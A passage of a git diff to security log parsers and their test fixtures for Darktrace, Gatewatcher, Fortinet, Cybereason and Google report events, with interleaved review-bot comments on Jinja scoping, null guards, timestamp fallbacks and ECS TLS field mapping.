}, "id": "11.7498520112250262440", "is_edr": "false", "modified_at": "2022-11-14T02:19:45.000000Z", @@ -33,7 +38,11 @@ "type": "File" }, "severity": "Low", - "status": "Closed" + "status": "Closed", + "user": { + "id": "0.2548072792133848559", + "is_admin": false + } } }, "file": { @@ -42,6 +51,13 @@ }, "name": "kprocesshacker.sys" }, + "host": { + "domain": "desktop-aaaaaa.example.org", + "name": "desktop-aaaaaa", + "os": { + "type": "windows" + } + }, "observer": { "product": "Cybereason", "vendor": "Cybereason" @@ -49,7 +65,14 @@ "related": { "hash": [ "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc" + ], + "user": [ + "system" ] + }, + "user": { + "domain": "desktop-aaaaa", + "name": "system" } } } \ No newline at end of file 
diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml index f28c8ffae..92a2d9ef2 100644 --- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml +++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml @@ -19,6 +19,8 @@ pipeline: output_field: datetime format: "%Y-%m-%d %H:%M:%S" - name: set_common_fields + - name: set_breach_devices_fields + filter: "{{json_event.message.breachDevices | length > 0}}" - name: set_aianalyst_fields filter: "{{json_event.message.log_type == 'aianalyst/incidentevents' or json_event.message.aiaScore != null}}" - name: set_modelbreaches_fields @@ -52,17 +54,15 @@ stages: observer.name: "Darktrace" observer.product: "Threat visualizer" host.ip: > - {% if json_event.message.device.ips is not in [[], Null]%} - [ - {% for ip in json_event.message.device.ips %} - {% if ip.get("ip") %} - {% if ip["ip"] | is_ipaddress %} - '{{ip["ip"]}}', - {% endif %} - {% endif %} - {% endfor %} - ] - {% endif %} + {%- set host_ips = [] -%} + {%- for ip in json_event.message.device.ips -%} + {%- if ip.get("ip") | is_ipaddress -%} + {%- set host_ips = host_ips.append(ip["ip"]) -%} + {%- endif -%} + {%- endfor -%} + {%- if host_ips | length > 0 -%} + {{ host_ips }} + {%- endif -%} set_modelbreaches_fields: actions: 
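Review bot: In the `@@ -52,17 +54,15 @@` hunk, `{%- set host_ips = host_ips.append(ip["ip"]) -%}` works only through the side effect of `append`: the assignment binds a loop-scoped `host_ips` to `None` for the rest of that iteration, and it is the outer list, mutated in place, that `{{ host_ips }}` renders afterwards. That reads as a bug waiting for the next editor; `{%- set _ = host_ips.append(ip["ip"]) -%}` expresses the mutation honestly and renders the same list. The `filter: "{{json_event.message.breachDevices | length > 0}}"` added in the first hunk inherits the existing assumption that `breachDevices` is always a list and never null, which is worth a comment if that is guaranteed by the source.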
@@ -136,19 +136,32 @@ stages: {%- endif -%} {{filters}} - set_aianalyst_fields: + set_breach_devices_fields: actions: - set: device.id: "{{json_event.message.breachDevices[0].did}}" event.action: "{{json_event.message.breachDevices[0].title}}" - host.hostname: "{{json_event.message.breachDevices[0].hostname}}" host.id: "{{json_event.message.breachDevices[0].did}}" host.mac: "{{json_event.message.breachDevices[0].mac}}" + + - set: + host.hostname: "{{json_event.message.breachDevices[0].hostname}}" + filter: '{{not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}' + + - set: host.name: "{{json_event.message.breachDevices[0].identifier}}" - filter: "{{json_event.message.breachDevices | length > 0}}" + filter: '{{not json_event.message.breachDevices[0].identifier.startswith("SaaS::")}}' + + - set: + user.email: "{{json_event.message.breachDevices[0].hostname.split()[-1]}}" + filter: '{{json_event.message.breachDevices[0].hostname.startswith("SaaS::") and "@" in json_event.message.breachDevices[0].hostname.split()[-1]}}' + - set: host.ip: "{{json_event.message.breachDevices[0].ip}}" - filter: "{{json_event.message.breachDevices | length > 0 and (json_event.message.breachDevices[0].ip | is_ipaddress)}}" + filter: "{{json_event.message.breachDevices[0].ip | is_ipaddress}}" + + set_aianalyst_fields: + actions: - set: event.kind: "alert" event.category: "threat" diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json new file mode 100644 index 000000000..ebf8a69eb --- /dev/null +++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json 
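Review bot: The new filters call `.startswith("SaaS::")` on `breachDevices[0].hostname` and `.identifier` without a null guard; in the same payload shape `ip` and `mac` are null for SaaS entities, and a network device with no resolved hostname would plausibly carry `hostname: null`, on which `startswith` raises instead of simply skipping the set as the old unconditional assignment did. Suggest `filter: '{{json_event.message.breachDevices[0].hostname != null and not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}'`, with the same guard on the `identifier` and `user.email` filters. The `set_aianalyst_fields` body continues outside the hunk.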
@@ -0,0 +1,79 @@ +{ + "input": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: 
john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}" + }, + "expected": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor 
john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 
1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}", + "event": { + "category": "threat", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-27T10:02:28.884000Z", + "darktrace": { + "threat_visualizer": { + "acknowledged": false, + "activityId": "da39a3ee", + "aiaScore": 93.67343783378601, + "attackPhases": [ + 3 + ], + "breachDevices": [ + { + "did": 3820, + "hostname": "SaaS::Zoom: john.doe@example.com", + "identifier": "SaaS::Zoom: john.doe@example.com", + "ip": null, + "mac": null, + "sid": -9, + "subnet": null + } + ], + "category": "critical", + "children": [ + "204a3642-a6f1-4ac3-85d0-add7dd0c9f9b" + ], + "currentGroup": "g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b", + "externalTriggered": false, + "groupCategory": "critical", + "groupScore": 21.063004966718992, + "groupingIds": [ + "3d2a2fc6" + ], + "mitreTactics": [ + "privilege-escalation" + ], + "periods": [ + { + "end": 1730023230000, + "start": 1730023230000 + } + ], + "relatedBreaches": [ + { + "modelName": "SaaS / Access / Unusual External Source for SaaS Credential Use", + "pbid": 46769, + "threatScore": 63.0, + "timestamp": 1730023232000 + } + ], + "userTriggered": false + } + }, + "device": { + "id": "3820" + }, + "host": { + "id": "3820" + }, + "observer": { + "name": "Darktrace", + "product": "Threat visualizer" + }, + "user": { + "email": "john.doe@example.com" + } + } +} \ No newline at end of file 
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
index 3ba5ae570..b64c616de 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
@@ -66,18 +66,14 @@
 "id": "2635"
 },
 "host": {
- "hostname": "SaaS::AzureActiveDirectory: test@test.fr",
- "id": "2635",
- "name": "SaaS::AzureActiveDirectory: test@test.fr"
+ "id": "2635"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
 },
- "related": {
- "hosts": [
- "SaaS::AzureActiveDirectory: test@test.fr"
- ]
+ "user": {
+ "email": "test@test.fr"
 }
 }
 }
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
index 781d6cce6..49512bdeb 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
@@ -158,15 +158,11 @@
 }
 },
 "host": {
- "id": "16",
- "ip": []
+ "id": "16"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
- },
- "related": {
- "ip": []
 }
 }
 }
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
index 90d9307b3..5092ebe13 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
@@ -118,15 +118,11 @@
 }
 },
 "host": {
- "id": "16",
- "ip": []
+ "id": "16"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
- },
- "related": {
- "ip": []
 }
 }
 }
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
index 9ae53b161..7866f9581 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
@@ -114,16 +114,12 @@
 }
 },
 "host": {
- "id": "6",
- "ip": []
+ "id": "6"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
 },
- "related": {
- "ip": []
- },
 "service": {
 "name": "Slack"
 },
diff --git a/Fortinet/fortigate/ingest/parser.yml b/Fortinet/fortigate/ingest/parser.yml
index 311e0deb0..cbb9b311a 100644
--- a/Fortinet/fortigate/ingest/parser.yml
+++ b/Fortinet/fortigate/ingest/parser.yml
@@ -191,7 +191,7 @@ stages:
 event.action: "{{parsed_event.message.name or parsed_event.message.FTNTFGTaction or parsed_event.message.FortinetFortiGateaction or parsed_event.message.act or parsed_event.message.action or parsed_event.message.reason}}"
 destination.address: "{{parsed_event.message.dstip or parsed_event.message.dst}}"
 destination.bytes: "{{parsed_event.message.rcvdbyte or parsed_event.message.in}}"
- destination.domain: "{{parsed_event.message.hostname or parsed_event.message.dhost}}"
+ destination.domain: "{{parsed_event.message.remotename or parsed_event.message.dhost or parsed_event.message.hostname}}"
 destination.mac: "{{parsed_event.message.dstmac}}"
 destination.nat.port: "{{parsed_event.message.destinationTranslatedPort}}"
 destination.packets: "{{parsed_event.message.rcvdpkt or parsed_event.message.FTNTFGTrcvpkt or parsed_event.message.FortinetFortiGatercvdpkt or parsed_event.message.get('Packets Received')}}"
diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index d0d85f7f6..8bc01d294 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -385,11 +385,20 @@ gatewatcher.tlp:
 type: text
 gatewatcher.tls:
- description: This field represents the tls field in a network metadata (used in
- legacy format log)
+ description: This field contains all TLS data fields in a TLS metadata
 name: gatewatcher.tls
 type: text
+gatewatcher.tls_fingerprint:
+ description: This field represents the TLS server fingerprint field in a TLS metadata
+ name: gatewatcher.tls_fingerprint
+ type: text
+
+gatewatcher.tls_sni:
+ description: This field represents the TLS SNI field in a TLS metadata
+ name: gatewatcher.tls_sni
+ type: text
+
 gatewatcher.ttp:
 description: This field is used for retrohunt alerts
 name: gatewatcher.ttp
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 45330587a..845abe396 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -10,7 +10,7 @@ pipeline:
 external:
 name: date.parse
 properties:
- input_field: "{{json_load.message.timestamp_analyzed}}"
+ input_field: "{{json_load.message.timestamp_detected}}"
 output_field: datetime
 format: null
 timezone: UTC
@@ -29,6 +29,8 @@ pipeline:
 description: DGA
 - name: retrohunt
 description: Retrohunt
+ - name: tls
+ description: TLS
 stages:
 common:
 actions:
@@ -122,7 +124,6 @@ stages:
 gatewatcher.sip: "{{json_load.message.sip}}"
 gatewatcher.smb: "{{json_load.message.smb}}"
 gatewatcher.ssh: "{{json_load.message.ssh}}"
- gatewatcher.tls: "{{json_load.message.tls}}"
 file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
 gatewatcher.dhcp: "{{json_load.message.dhcp}}"
 gatewatcher.dnp3: "{{json_load.message.dnp3}}"
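Review bot: Switching date.parse's `input_field` to `json_load.message.timestamp_detected` leaves events that do not carry that key without an `@timestamp`; the new sigflow-tls fixture in this same commit has only `timestamp` and `timestamp_analyzed`, and its expected output indeed contains no `@timestamp`. A fallback chain keeps a timestamp for such events: `input_field: "{{json_load.message.timestamp_detected or json_load.message.timestamp or json_load.message.timestamp_analyzed}}"`. A short comment above the key explaining why detection time is preferred over analysis time would also help, since the fixture timestamps move backwards by up to twenty minutes and a reader of the expected files will otherwise wonder which one is authoritative.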
@@ -202,3 +203,16 @@ stages:
 gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}"
 gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}"
 gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}"
+ tls:
+ actions:
+ - set:
+ tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+ tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+ tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+ tls.server.subject: "{{json_load.message.tls.subject}}"
+ gatewatcher.tls: "{{json_load.message.tls}}"
+ gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+ gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+ tls.version: "{{json_load.message.tls.version}}"
+ tls.server.not_after: "{{json_load.message.tls.notafter}}"
+ tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
index f16f95623..6d7eb789a 100644
--- a/GateWatcher/aioniq/tests/codebreaker.json
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -17,7 +17,7 @@
 "module": "powershell",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:32:50.269000Z",
+ "@timestamp": "2023-03-22T10:30:37.145000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
index b9db082ca..9d702ce4d 100644
--- a/GateWatcher/aioniq/tests/dga.json
+++ b/GateWatcher/aioniq/tests/dga.json
@@ -17,7 +17,7 @@
 "module": "dga",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:46:08.487000Z",
+ "@timestamp": "2023-03-22T10:25:54.903000Z",
 "destination": {
 "address": "pgoadcmgqfacj.com",
 "domain": "pgoadcmgqfacj.com",
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index ba95cc211..b5d0a4f69 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
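Review bot: `tls.version: "{{json_load.message.tls.version}}"` stores the vendor string verbatim (`TLS 1.3` in the sigflow-tls fixture), whereas ECS defines `tls.version` as the bare version number (`1.3`) with the protocol name in `tls.version_protocol`, so detection content written against ECS will not match these events. If the vendor always uses the `TLS <n>` form, the split is two lines: `tls.version: "{{json_load.message.tls.version | replace('TLS ', '')}}"` and `tls.version_protocol: "tls"`. The keys in the `- set:` block are also in no particular order (server fields interleaved with `gatewatcher.*` and `tls.version`); grouping the `tls.server.*` keys together reads better. Finally, the fixture only exercises sni, version and ja3s, so the issuerdn/subject/chain/notbefore/notafter mappings, including whether `chain` has the list-of-PEM shape ECS expects for `tls.server.certificate_chain`, remain untested.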
@@ -20,7 +20,7 @@
 "info"
 ]
 },
- "@timestamp": "2023-03-22T10:53:13.408000Z",
+ "@timestamp": "2023-03-22T10:35:22.615000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
index fd29bcfa4..7c8728304 100644
--- a/GateWatcher/aioniq/tests/retrohunt.json
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -17,7 +17,7 @@
 "module": "retrohunt",
 "severity": 1
 },
- "@timestamp": "2023-06-12T10:12:39.001000Z",
+ "@timestamp": "2023-06-09T14:08:46.845000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index 1de9534f5..626ee8eb7 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -19,7 +19,7 @@
 "module": "alert",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:44:08.001000Z",
+ "@timestamp": "2023-03-22T10:25:55.690000Z",
 "destination": {
 "address": "2.2.2.2",
 "bytes": 90364,
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
index 2e1580dce..7e9cc8b6a 100644
--- a/GateWatcher/aioniq/tests/sigflow-file.json
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
@@ -16,7 +16,7 @@
 ],
 "module": "fileinfo"
 },
- "@timestamp": "2023-03-22T10:44:07.998000Z",
+ "@timestamp": "2023-03-22T10:25:55.469000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
index 4da5dbc30..6e8cba037 100644
--- a/GateWatcher/aioniq/tests/sigflow-meta.json
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -16,7 +16,7 @@
 ],
 "module": "http"
 },
- "@timestamp": "2023-03-22T10:44:07.997000Z",
+ "@timestamp": "2023-03-22T10:25:55.377000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json
new file mode 100644
index 000000000..ff8624608
--- /dev/null
+++ b/GateWatcher/aioniq/tests/sigflow-tls.json
@@ -0,0 +1,68 @@
+{
+ "input": {
+ "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Gatewatcher AionIQ v102",
+ "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "module": "tls"
+ },
+ "destination": {
+ "address": "5.6.7.8",
+ "ip": "5.6.7.8",
+ "port": 443
+ },
+ "gatewatcher": {
+ "event_type": "tls",
+ "flow_id": "1366008699485799",
+ "gcap": "gcap-xxxxxxxxx.domain.local",
+ "gcenter": "gcenter-xxxxxxxx.domain.local",
+ "timestamp_analyzed": "2024-11-21T13:02:44.291Z",
+ "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}",
+ "tls_sni": "www.microsoft.com",
+ "type": "suricata"
+ },
+ "network": {
+ "transport": "TCP"
+ },
+ "observer": {
+ "hostname": "gcap-xxxxxxxxx.domain.local",
+ "mac": [
+ "82:df:ee:4f:81:af",
+ "e6:43:7e:91:1b:92"
+ ],
+ "name": "gcap-xxxxxxxxx.domain.local",
+ "type": "ids",
+ "version": "0.2"
+ },
+ "related": {
+ "hosts": [
+ "gcap-xxxxxxxxx.domain.local"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 64809
+ },
+ "tls": {
+ "server": {
+ "ja3s": "15af977ce25de452b96affa2addb1036"
+ },
+ "version": "TLS 1.3"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..a8ee3a54d 100644
--- a/Google Cloud/google-report/_meta/fields.yml
+++ b/Google Cloud/google-report/_meta/fields.yml
@@ -1,3 +1,8 @@
+google.report.access.application:
+ description: Application name
+ name: google.report.access.application
+ type: keyword
+
 google.report.actor.email:
 description: ''
 name: google.report.actor.email
@@ -33,6 +38,46 @@ google.report.parameters.visibility:
 name: google.report.parameters.visibility
 type: keyword
+google.report.rule.data_source:
+ description: Data source
+ name: google.report.rule.data_source
+ type: keyword
+
+google.report.rule.name:
+ description: Name of the rule
+ name: google.report.rule.name
+ type: keyword
+
+google.report.rule.scan_type:
+ description: Scan type
+ name: google.report.rule.scan_type
+ type: keyword
+
+google.report.rule.severity:
+ description: Severity of the rule
+ name: google.report.rule.severity
+ type: keyword
+
+google.report.rule.type:
+ description: Rule type
+ name: google.report.rule.type
+ type: keyword
+
+google.report.saml.application_name:
+ description: Saml SP application name
+ name: google.report.saml.application_name
+ type: keyword
+
+google.report.saml.initiator:
+ description: SAML requester of saml authentication
+ name: google.report.saml.initiator
+ type: keyword
+
+google.report.saml.status_code:
+ description: SAML response status
+ name: google.report.saml.status_code
+ type: keyword
+
 google.report.token.app_name:
 description: Token authorization application name
 name: google.report.token.app_name
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..4633f32de 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -168,6 +168,273 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The 